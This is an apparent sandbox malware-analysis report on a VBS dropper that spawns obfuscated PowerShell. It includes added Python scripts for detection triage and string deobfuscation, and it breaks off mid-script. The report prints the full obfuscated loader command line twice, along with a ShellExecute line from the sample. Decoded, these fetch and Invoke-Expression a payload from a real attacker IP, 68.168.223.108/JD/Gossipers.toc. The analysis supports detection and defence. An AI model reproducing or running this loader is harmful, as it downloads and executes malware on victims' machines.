Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs", ProcessId: 7832, ProcessName: wscript.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. 
etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigtelAssy.:Cre cA rideQ .vlsuVindaa SkribGe.neERadio
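The "WScript or CScript Dropper", "Wscript starts Powershell" and "Very long command line found" signatures, and the three Sigma matches listed above, all key on one process-creation event: wscript.exe (PID 7832) spawning powershell.exe (PID 8104) with a multi-kilobyte argument string. The Python below is an added example of that triage logic run over process-creation events; it is not one of the Sigma rules named above and not Joe Sandbox code. The events are constructed from the PIDs, images and the head of the command line in the process tree. The parent image of wscript.exe, the benign comparison event and the 500-character length threshold are assumptions; the threshold is deliberately low so that the truncated excerpt trips it and should be tuned to your own baseline. The marker strings are the three the ditekSHen Yara rule matched in this report (`::FromBase64String(`, `-join`, `+=`) plus the `ni -p` form this sample uses to define functions. Note that `function:` never appears literally in the command line, because it is assembled from `'func'`, `'t'`, `'i'` and `'on:'`; a static match on that string would miss.

```python
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon event 1 / Security 4688 style)."""
    pid: int
    parent_pid: int
    image: str
    parent_image: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# The first three are the strings the INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
# rule matched in this report; "ni -p " (New-Item on the function: drive) is an assumption
# drawn from how this sample defines its functions, not from a published rule.
OBFUSCATION_MARKERS = ("::FromBase64String(", "-join", "+=", "ni -p ")
LONG_CMDLINE_CHARS = 500  # assumption: low so the truncated excerpt below trips it; tune to baseline

# Head of the real powershell.exe command line from the process tree (truncated; the
# full argument string in the report is several kilobytes long).
PS_HEAD = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;'
    "$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';"
    "$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value "
    "{ param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];"
    "$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;"
    "(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;"
    "$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';"
)

# Constructed events. PIDs 7832/8104/8116 and their images and parents follow the process
# tree above (the parent PID 3964 of wscript.exe comes from the Sigma data; its image is an
# assumption). PID 9001 is an assumed benign comparison.
EVENTS = [
    ProcEvent(7832, 3964, r"C:\Windows\System32\wscript.exe", r"C:\Windows\explorer.exe",
              r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs"'),
    ProcEvent(8104, 7832, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\wscript.exe", PS_HEAD),
    ProcEvent(8116, 8104, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(9001, 9000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cmd.exe", r"powershell.exe -File C:\ops\rotate-logs.ps1"),
]


def image_name(path):
    """Basename of a Windows path, lower-cased, regardless of the host OS."""
    return ntpath.basename(path).lower()


def triage(ev, long_cmdline=LONG_CMDLINE_CHARS):
    """Return the list of reasons this event is suspicious (empty if none)."""
    reasons = []
    if image_name(ev.parent_image) in SCRIPT_HOSTS and image_name(ev.image) in SHELLS:
        reasons.append("script host spawned shell")
    if len(ev.cmdline) >= long_cmdline:
        reasons.append("very long command line (%d chars)" % len(ev.cmdline))
    hits = [m for m in OBFUSCATION_MARKERS if m in ev.cmdline]
    if len(hits) >= 2:
        reasons.append("obfuscation markers: " + ", ".join(hits))
    return reasons


def triage_all(events):
    """Map pid -> reasons for every event that raised at least one reason."""
    flagged = {}
    for ev in events:
        reasons = triage(ev)
        if reasons:
            flagged[ev.pid] = reasons
    return flagged


if __name__ == "__main__":
    for pid, reasons in triage_all(EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

Only PID 8104 is flagged, on all three criteria; wscript.exe itself, conhost.exe and the benign cmd.exe-launched PowerShell raise nothing. Each criterion alone is noisy in a real estate (administrators run long PowerShell lines, and `+=` is everywhere), which is why the parent/child pairing is the anchor and the other two are corroboration; the same 50 DNS-less TCP connections to a bare IP listed below would be the network-side corroboration.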
          No Suricata rule has matched


          AV Detection

Source: Submitted Sample; Neural Call Log Analysis: 98.7%
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2565274087.0000000006DCE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Core.pdb5 source: powershell.exe, 00000008.00000002.2572137053.0000000007D28000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: .Core.pdb source: powershell.exe, 00000008.00000002.2572137053.0000000007D28000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic; HTTP traffic detected:
GET /JD/Gossipers.toc HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Host: 68.168.223.108
Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 68.168.223.108 (50 identical entries in the report)
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.1
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.16
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168.
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168.2
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168.22
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168.223
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168.223.
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168.223.1
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168.223.10
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A5700000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168.223.108
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168.223.108/
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168.223.108/J
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168.223.108/JD
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168.223.108/JD/
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168.223.108/JD/G
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168.223.108/JD/Go
Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://68.168.223.108/JD/Gos
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Goss
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossi
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossip
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipe
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossiper
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipers
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipers.
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipers.t
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipers.to
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipers.toc
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipers.tocP
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipers.tocXR
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.H
          Source: wscript.exe, 00000000.00000003.1265664478.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260517825.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1272116245.000001D5A5B7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1262046725.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1273952548.000001D5A5BB4000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: wscript.exe, 00000000.00000003.1265664478.000001D5A7A3B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1262046725.000001D5A7A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6f4070b188b28
          Source: wscript.exe, 00000000.00000003.1272116245.000001D5A5B7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1273952548.000001D5A5BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabj
          Source: wscript.exe, 00000000.00000003.1272116245.000001D5A5B7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1273952548.000001D5A5BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/env
          Source: wscript.exe, 00000000.00000003.1266618163.000001D5A7A10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1262500209.000001D5A79E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6f4070b188
          Source: powershell.exe, 00000005.00000002.1394333131.000001D1B4995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A4921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2541328902.0000000004381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000005.00000002.1403411874.000001D1BD0B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A4921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000008.00000002.2541328902.0000000004381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000005.00000002.1394333131.000001D1B4995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

          System Summary

          Source: amsi32_1040.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 8104, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 1040, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Initial file: Growler=Udvisket.ShellExecute(Afmeld,Alumbrado(odonates) & Nonpunitory & Alumbrado(odonates),"","",0)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. 
etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigt
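The command line above is a single PowerShell one-liner whose only real work is hidden behind a positional string decoder. $Thickskulled is assembled from 'func'+'t'+'i'+'on:' into "function:", so `ni -p $Thickskulled -n Centralkomites -value {...}` is New-Item on the Function: PSDrive, an obfuscated function declaration. Centralkomites keeps every sixth character of its argument starting at index 5 (the do/until loop stops when the index runs off the end and PowerShell returns $null). Desiodothyroxine3 decodes 'RykkeiIsthmEPermix' to iEx and dot-invokes it, so every decoded string is fed to Invoke-Expression. The same one-character-at-a-time `+=` is why the memory-string list above contains every prefix of the URL: each append on an immutable .NET string leaves the previous prefix behind. The following Python is an added analyst script, not part of the Joe Sandbox report or the sample; it extracts the decoder's name, start index and stride from the script text and replays it over the string literals. SAMPLE is a constructed excerpt built from literals copied out of the report's command line; the User-Agent literal is deliberately left out because the report page collapses its runs of spaces, which breaks a positional decode.

```python
import re

# Constructed excerpt: the decoder definition and four of its call sites, copied
# from the string literals shown in the report's command line and joined together.
SAMPLE = (
    "$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;"
    "$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';"
    "(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);"
    "$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];"
    "$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});"
    "(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});"
    "$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';"
    "$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';"
    "$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';"
    "$Likrer=Centralkomites 'RykkeiIsthmEPermix';"
)

# Shape of the decoder as defined via New-Item on the Function: drive:
#   -n NAME -value { param($s);$i=START;do {$acc+=$s[$i];$i+=STEP} until(...) }
DECODER_DEF = re.compile(
    r"-n\s+(?P<name>\w+)\s+-value\s*\{\s*param\(\$\w+\);\$\w+=(?P<start>\d+);"
    r"do\s*\{\$\w+\+=\$\w+\[\$\w+\];\$\w+\+=(?P<step>\d+)\}"
)


def find_decoder(script):
    """Locate the decoder and return (function name, start index, stride)."""
    m = DECODER_DEF.search(script)
    if m is None:
        raise ValueError("no positional string decoder found")
    return m.group("name"), int(m.group("start")), int(m.group("step"))


def stride_decode(blob, start, step):
    """Replay the do/until loop: keep blob[start], blob[start+step], ... until the
    index runs past the end (PowerShell yields $null there, which ends the loop)."""
    return blob[start::step]


def decode_assignments(script):
    """Return {variable: decoded value} for every `$var = NAME '...'` or `+=` call,
    concatenating chunks exactly as the script's own += does."""
    name, start, step = find_decoder(script)
    call = re.compile(r"(\$\w+)\s*\+?=\s*" + re.escape(name) + r"\s+'([^']*)'")
    decoded = {}
    for var, blob in call.findall(script):
        decoded[var] = decoded.get(var, "") + stride_decode(blob, start, step)
    return decoded


def function_drive_name(script):
    """Recover the variable handed to `ni -p` when it is built from literals,
    e.g. 'func' + 't' + 'i' + 'on:' -> 'function:'."""
    m = re.search(r"ni\s+-p\s+(\$\w+)", script)
    if m is None:
        return None
    var = re.escape(m.group(1))
    return "".join(re.findall(var + r"\s*\+?=\s*'([^']*)'", script))


if __name__ == "__main__":
    print("decoder:", find_decoder(SAMPLE))
    print("ni -p target:", function_drive_name(SAMPLE))
    for var, value in decode_assignments(SAMPLE).items():
        print(f"{var} = {value!r}")
```

Run against the excerpt it yields iEx for $Likrer, Tls12 for $Humps, "Mozilla/" for the start of the User-Agent, and http://68.168.223.108/JD/Gossipers.toc for $Briggsk116, which is the GET the report captured. Strings passed by variable rather than literal (the `Desiodothyroxine3 (Centralkomites $Personnummers)` call) have to be resolved first; decoded by hand, $Personnummers is, case-insensitively, `[Net.ServicePointManager]::SecurityProtocol=$Humps`, and $Konsigneres='\Discoach.Imm' is the file the report shows being dropped under AppData\Roaming. Only the chunks with no repeated whitespace can be trusted from a rendered page; decode from the raw .vbs or the logged command line whenever possible.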
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
          Source: Agterdelen.vbsInitial sample: Strings found which are bigger than 50
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7296
          Source: unknownProcess created: Commandline size = 7296
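The three facts the report records here, wscript.exe as the parent, powershell.exe as the child and a 7296-byte command line, are individually noisy but together are a reliable signal for this loader family. The Python below is an added example written for this page, not Joe Sandbox or Sigma code; it scores constructed Sysmon Event ID 1-style records (ParentImage, Image, CommandLine) and alerts only when at least two independent indicators agree. The 4096-byte threshold and the three obfuscation markers are assumptions modelled on the shape of the command line in this report; GULOADER_CMD reproduces its opening and pads the rest with a constructed filler so the length check is exercised.

```python
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
LONG_CMDLINE = 4096  # assumed alert threshold; the report measured 7296 bytes

# Markers modelled on this sample's command line (assumed, tune to your telemetry).
OBFUSCATION_MARKERS = {
    "New-Item on the function: drive": re.compile(r"\bni\s+-p\s+\$\w+\s+-n\s+\w+\s+-value\s*\{", re.I),
    "positional character loop": re.compile(r"\$\w+\+=\$\w+\[\$\w+\];\$\w+\+=\d+"),
    "indirect invocation .($var) ($arg)": re.compile(r"\.\(\$\w+\)\s*\(\$\w+\)"),
}

# Opening of the report's command line, then constructed padding standing in for
# the remaining ~6.5 KB of obfuscated script.
GULOADER_CMD = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Get-Service;'
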